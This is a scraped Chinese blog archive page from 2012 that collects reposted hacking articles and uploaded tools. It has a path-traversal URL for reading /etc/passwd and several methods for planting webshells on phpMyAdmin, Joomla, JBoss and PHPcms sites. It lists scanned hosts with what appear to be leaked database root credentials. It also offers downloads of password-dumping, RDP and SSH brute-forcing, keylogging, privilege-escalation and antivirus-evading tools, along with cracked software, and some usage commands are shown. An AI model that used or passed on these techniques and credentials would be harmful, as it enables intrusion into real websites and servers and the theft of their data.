2012年08月_fengling132

11月 10月 09月 08月 07月 06月 05月 04月 03月

转载 SpeedCMS任意文件下载读取漏洞

作者：90sex90sec《www.90sec.org》163微论坛《www.admin163.net》关键字：inurl:article/file/cidhttp://admin163.net/article/file/cid/ ... ../../../etc/passwd数据库下载地址：?file=../../../..

2012-08-31 17:28:18 1541

转载 Discuz/phpcms等开源程序配置文件集合

兄弟们在渗透测试的时候可能都需要找数据库的配置文件吧，今天刚好遇到了一个joomla怎么也找不到配置文件，于是网上搜索了一下，终于找到一个数据库配置路径的集合文件，分享给大家。。开源系统据库配置文件名文件名所在的目录Discuz! config.in

2012-08-31 17:24:43 538

转载 DZ x2.5 爆路径漏洞

测试exp: http://localhost/uc_server/control/admin/db.php http://localhost/source/plugin/myrepeats/table/table_myrepeats.php http://localhost/install/include/install_lang.php

2012-08-23 13:35:56 854

转载 phpMyAdmin 后台拿webshell

(旧的东西记录下方便以后xxx..)1.如何拿到登陆密码. 自己想办法 2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.3.选择一个Database.运行以下语句.----start code---CREATE TABLE a (cmd text NOT NULL);INSERT

2012-08-23 13:35:17 750

转载批量拿joomla的webshell

本次批量拿的webshell都是php的，而且大都是linux服务器搭建的，大家不要去搞破坏！首先，Google：核心是 Joomla!. 有效 XHTML 和 CSS. 打开网址，加上后缀：index.php?option=com_user&view=reset&layout=confirm来到确认用户页面，提示你要输入暗号，我们输入单引号 ' ,点击发送，

2012-08-15 16:48:42 3419

转载 joomla CMS后台另类拿WebShell方法

漏洞概要关注数(0) 关注此漏洞缺陷编号： WooYun-2011-02640漏洞标题： joomla CMS后台另类拿WebShell方法相关厂商： joomla CMS漏洞作者： akacd提交时间： 2011-08-07公开时间： 2011-08-07漏洞类型：命令执行危害等级：中自评Rank： 7

2012-08-15 16:47:03 2787

转载 Joomla远程上传漏洞可直接getshell

作者：1337 1. 有些joomal需要先注册. http://site/index.php?option=com_user&view=login 2. 到上传地址 http://www.2cto.com /index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en 3.

2012-08-15 16:39:52 2692

转载利用JBoss漏洞拿webshell方法

JBoss是一个大型应用平台，普通用户很难接触到。越是难以接触到的东西越觉得高深，借用北京公交司机李素丽的一句话“用力只能干出称职，用心才能干出优秀”，在安全上也是如此，虽然JBoss平台很难掌握，但是只要找到Jboss的罩门，一样轻松渗透，本文就如何针对Jboss的一个漏洞来获取其Webshell，由于是研究，因此仅仅点到为止。　　一、信息收集与整理 1.使用漏洞特征进行搜索

2012-08-15 13:12:50 17986

转载 PHPcmsV9任意文件读取漏洞拿Shell

编辑：madman 日期：2012-07-29 分类：技术文章, 最新漏洞评论：9条评论简介：作者：Return 前几天爆的phpcmsV9任意文件读取漏洞，其实危害是很大的，但往往还是一些管理员觉得漏洞并不可怕，听到某人说道，即使是被人读取了数据库数据也没用，为啥，因为他权限数据库权限单库单用户，并且v9制作前台cms发布里面就只有管理员账户并且不发分子拿到密码也没用因为破解

2012-08-02 21:57:53 1515

转载发一批 phpcmsV9 系统漏洞mysql

编辑：madman 日期：2012-08-02 分类：最新漏洞评论：6条评论简介：一批 phpcmsV9 系统漏洞批量扫描到的mysql 后面为yes大多数是可以外连的，偶尔几个不可以。需要工具的联系我。至于怎么连接以及拿shell 请看：http://madman.in/madman5/871.htm www.tj180.com—-root—-Hlj.com@)!!db—-hu

2012-08-02 21:56:36 2120

转载分享2个修改版的sqlmap

分享2个修改版的sqlmap。一个是由论坛核心成员uing07制作的win下的不需要py环境就能执行的sqlmap。截图：下载：http://down.f4ck.net/soft/SqlmapNoPy.rar一个是由论坛核心成员ettack制作的汉化版的sqlmap。截图：使用方法：

2012-08-01 16:34:48 700

转载 usp10.dll|lpk.dll提权工具

将此DLL文件放入服务器存在EXE的目录中，重启后（可以攻击导致重启，其他方法也行，就是让系统再次运行此目录的任何一个EXE就行）比如放在c:\php\目录下，下次重启后就会在服务器中添加用户bmd,密码为cunzhang的管理员帐号(网上已经存在了，不过没有测试成功，此款测试成功，大家可以自己测试附件压缩包为测试用的EXE，点击TEST.EXE，然后关闭就会添加用户BMD，也可以在同目录

2012-08-01 16:26:47 1902

全国省市区的plist文件<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>北京市</key> <dict> <key>0</key> <dict> <key>北京市</key> <array> <string>东城区</string> <string>西城区</string> <string>朝阳区</string> <string>丰台区</string> <string>石景山区</string> <string>海淀区</string> <string>门头沟区</string> <string>房山区</string> <string>通州区</string> <string>顺义区</string> <string>昌平区</string> <string>大兴区</string> <string>怀柔区</string> <string>平谷区</string> <string>密云县</string> <string>延庆县</string> </array> </dict> </dict> </dict> </plist>

2015-01-12

VMware vSphere 4.1的BT种子

VMware vSphere 4.1BT的种子。1、在ESxserver中点击性能选项卡，可以很清楚的看到整个server或者单独的guest os对cpu、内存、network 、系统的资源占用情况。还可以为每个虚拟机分配保留的资源，也可以限制其最大使用的资源。 2、在vmware workstation中，当建立多个虚拟机，并且需要对外发布服务的时候，就会造成异常。而在ESX Server中，把每个网卡都虚拟成了一个多达64口的交换机，即使多个虚拟机共享一个网卡对外发布服务，都没有任何的问题。 3、支持虚拟机的自动启动。当host主机需要reboot 时，主机启动后，可以设定主机上的虚拟机自动启动，而且可以采用延时启动的方式，比如间隔120s，逐个启动虚拟机，启动哪几个虚拟机也是可以设定的。 4、支持时间任务计划。可以设定在指定的时间执行任务，比如打开或者关闭虚拟机。一个可行的方案就是在早上8点打开某服务的虚拟机，而在下午六点半下班以后将虚拟机进入suspend状态。 5、支持多用户管理，可以添加多个用户帐号，进行ESX Server的管理，可以设定不同的用户权限，比如是admin还是power user ，比如是否可以建立虚拟机，是否具有关闭电源的权利等等。 6、支持虚拟机模板技术，可以将一个虚拟机clone 或者 convert 为一个 template ,比如，我们将一个RHEL的guest os转化为模板，当需要新建一台虚拟机的时候，只需要从这个template deploy出来即可。模板和虚拟机的转化是双向的。也可以将模板重新转化回虚拟机，这样的好处是可以保证模板永远是最新最使用的。 7、支持虚拟机的迁移，可以将一个虚拟机从一台ESx server转移到另外一台ESX server 。如果使用了Vmotion ，这个转移过程还可以是自动的，根据一些设定好的条件，如资源占用情况，是否宕机等等。当然，这种转移需要共享存储的支持。 8、可以通过VC控制台对存储空间进行管理，比如上传或者下载文件，在控制台界面中，默认的布局是host and cluster ,可以选择datastore，就可以看到存储界面了，可以常看其状态并进行文件管理。 9、ESX是支持存储的，无论是SAN还是NAS，可以用openfiler或者freenas来模仿SAN或者NAS。在ESX中，需要配置一个网卡作为vmkernel和存储通讯，还要在openfiler或者freenas中设置安全措施，或者允许的ip地址访问等等。 10、支持snapshot ，很方便的功能，对虚拟机做了snapshot后，任何时候都可以恢复到做snapshot时的系统状态，支持多个snapshot，相当于guest os有了一个时光机器。

2012-11-11

Kiwi Syslog v8.3.28 Crack 专业版破解

2012-11-05

Python标准库中文版

1. 核心模块 o 1.1. 介绍 o 1.2. _ _builtin_ _ 模块 o 1.3. exceptions 模块 o 1.4. os 模块 o 1.5. os.path 模块 o 1.6. stat 模块 o 1.7. string 模块 o 1.8. re 模块 o 1.9. math 模块 o 1.10. cmath 模块 o 1.11. operator 模块

2012-11-02

SqlmapNoPy.rar

下载：http://down.f4ck.net/soft/SqlmapNoPy.rar 一个是由论坛核心成员ettack制作的汉化版的sqlmap。

2012-08-01

sqlmap_cn.tar

分享2个修改版的sqlmap。一个是由论坛核心成员uing07制作的win下的不需要py环境就能执行的sqlmap。

2012-08-01

phpv9.rar

phpcms V9最新漏洞利用工具工具作者：B0y

2012-07-25

Findpassword

Findpassword找到系统密码，2003密码

2012-07-15

mdb解包.rar

mdb解包,解压webshell打包的文件

2012-07-10

74cmsexp_t00ls.rar

so… 直接向 admin_login.php?act=do_login 构造以下POST语句就能直接进后台了~~ 当然前提你得有后台路径:

2012-07-03

sqlmap-add8352.tar.gz

sqlmap 是一个自动SQL 射入工具。它是可胜任执行一个广泛的数据库管理系统后端指印, 检索遥远的DBMS 数据库, usernames, 桌, 专栏, 列举整个DBMS, 读了系统文件和利用导致SQL 射入弱点的网应用编程的安全漏洞。

2012-07-02

K8MSSQL.rar

程序:K8-MSSQL综合利用工具V1.0 语言:VS2010 C# (.NET Framework v2.0) 作者:拉登哥哥 QQ:396890445 更新历史: 2012-06-09 [+] BCP导出txt(可导出整个表) 秒脱百万/千万记录测试导出CSDN 640W数据仅需10-15秒 [+] 导出htm格式(可导出指定列) 只适合100W以下记录 [+] 修复空格(数据库名/表名/列名)不能导出的bug [+] 修复纯数字列名/字段不能的bug [+] 显示当前要导出表的记录总数

2012-07-02

sqlmap-0.9.zip

2012-07-02

sqlmap-add8352

2012-07-02

struts工具_95096

struts工具_95096漏洞利用工具，你们懂的。

2012-06-29

iis批量扫描工具

iis.rar 批量扫描工具好久就想写了,今天有点时间,就把以前的笔记整理一下主要是针对shell 有 net work 权限可以跨目录写入文件但是不能浏览找不到目标站的绝对路径的一个技巧! 呵呵找到用户名和绝对路径的关系一个简单的批处理即可把VirtualHost几百个网站(一般是 180)全部写入一句话

2012-05-08

mimikatz_trunk.zip

密码嗅探技术，最近很流行的工具，很强大。

2012-05-03

mimikatz_trunk (2).zip

windows密码嗅探，很好的工具啦。

2012-05-03

Webkey_1.91.apk

通过电脑以WIFI无线方式登录Android安卓手机，就像Linux的SSH远程控制一样，可以在电脑浏览器中打开手机屏幕，并执行手机程序(打电话、发短信、上网等)，还可以查看、操作SDCard的文件，获得GPS位置，截取手机屏幕，手机和电脑直接聊天等等。能实现这一功能的就是Webkey这款软件。

2012-05-02

logkeys-0.1.1a.tar.gz

linux下的键盘记录分类：工具 2012-05-02 15:00 0人阅读评论(0) 收藏编辑删除安装： wget http://logkeys.googlecode.com/files/logkeys-0.1.1a.tar.gz tar -xf logkeys-0.1.XX.tar.gz cd logkeys-0.1.XX ./configure make make check make install 使用： logkeys -s -u -o log.txt

2012-05-02

DUBrute_2.1

DUBrute_2.1，2.1的版本比2.0的版本稳定性要强，效果要更好些，以前用2.0进行爆破2003的系统可以成功，但是xp就成功不了，但是2.1的版本破解xp的3389效果也相当不错

2012-04-03

ms12-020压缩包

　　本次Windows RDP服务的这个漏洞也使得攻击者控制用户服务器或者造成蓝屏 3月19日消息，Windows服务器近日被爆存在高危远程代码执行漏洞——MS12-020，微软公司把该漏洞级别定为最高级-严重(Critical)，攻击者可以通过向远程桌面端口(端口号3389)发送特定的数据包获得管理员权限

2012-04-03

DUBrute_v2.0_rc3.rar

DUBrute_v2.0_rc3.rar,rc2的升级版，效果不错，专门破解3389的超强工具，工具压缩包里含有3389端口的扫描程序，此程序可批量扫描3389，破解3389

2012-04-02

Recton v2.6免杀加强版.exe

Recton v2.6免杀加强版局域网在获得用户名密码的前提下，可以进行开启telnet，进程，种植等

2012-04-02

libssh2-1.2.7.tar.gz

安装libssh2-1.2.7 将libssh2-1.2.7.tar.gz拷贝到/tmp/目录下，解压为libssh2-1.2.7并进入该目录: 2.1 ./configure 2.2 make 2.3 make install

2012-04-01

medusa-2.0.tar.gz

渗透linux环境的网络，口令破解是必不可少的。接下来介绍一款优秀的口令破解工具，medusa-2.0.tar.gz 将字典(如brute.dic, p.dic)拷贝到目录/tmp/后，进入/tmp/目录，键入medusa可以看到其它帮助信息，根据帮助信息可以开始破解SSH.。e.g., (假设我们要破解的目标IP为192.168.10.126) [root@CentOS2 tmp]# medusa -h 192.168.10.126 -U brute.dic -P p.dic -t 7 -f -r 10 -M ssh

2012-04-01

RGSupplicant4.10_1026.rar

锐捷客户端破解版可以使用代理等业务不会掉线这是农林大学的一个人做的

2012-03-30

利客联盟phpshell-2.0.rar

用phpshell2.0和Linux Kernel2.6x 本地溢出代码配合提ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。

2012-03-30

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人